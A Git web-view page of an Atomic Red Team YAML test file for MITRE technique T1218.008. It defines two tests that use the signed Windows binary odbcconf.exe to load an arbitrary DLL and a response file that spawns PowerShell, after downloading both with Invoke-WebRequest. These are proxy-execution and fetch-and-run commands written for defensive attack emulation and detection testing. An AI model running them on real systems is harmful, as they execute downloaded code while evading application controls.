security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1218.008/T1218.008.yaml
T
Carrie Roberts d4709021fb Handle spaces in file paths (#2535) 
* updating atomics count in README.md [ci skip]

* wip

* handle spaces in path

* update readme

* fix typo

---------

Co-authored-by: publish bot <opensource@redcanary.com>
2023-09-22 10:47:25 -06:00

58 lines
2.3 KiB
YAML
Raw Permalink Blame History

attack_technique: T1218.008
display_name: 'Signed Binary Proxy Execution: Odbcconf'
atomic_tests:
- name: Odbcconf.exe - Execute Arbitrary DLL
auto_generated_guid: 2430498b-06c0-4b92-a448-8ad263c388e2
description: |
Execute arbitrary DLL file stored locally.
supported_platforms:
- windows
input_arguments:
dll_payload:
description: DLL to execute
type: path
default: PathToAtomicsFolder\T1218.008\src\Win32\T1218-2.dll
dependency_executor_name: powershell
dependencies:
- description: |
T1218-2.dll must exist on disk at specified location (#{dll_payload})
prereq_command: |
if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
executor:
command: |
odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
name: command_prompt
- name: Odbcconf.exe - Load Response File
auto_generated_guid: 331ce274-f9c9-440b-9f8c-a1006e1fce0b
description: |
Execute arbitrary response file that will spawn PowerShell.exe.
Source files: https://github.com/woanware/application-restriction-bypasses
supported_platforms:
- windows
input_arguments:
rsp_file_name:
description: Response file name to load
type: string
default: T1218.008.rsp
rsp_file_path:
description: Response file path
type: string
default: PathToAtomicsFolder\T1218.008\bin\
dependency_executor_name: powershell
dependencies:
- description: |
T1218.008.rsp must exist on disk at specified location (#{rsp_file_path}#{rsp_file_name})
prereq_command: |
if (Test-Path "#{rsp_file_path}#{rsp_file_name}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/T1218.008.rsp" -OutFile "#{rsp_file_path}#{rsp_file_name}"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/o.dll" -OutFile "#{rsp_file_path}\o.dll"
executor:
command: |
cd "#{rsp_file_path}"
odbcconf.exe -f "#{rsp_file_name}"
name: command_prompt
Reference in New Issue View Git Blame Copy Permalink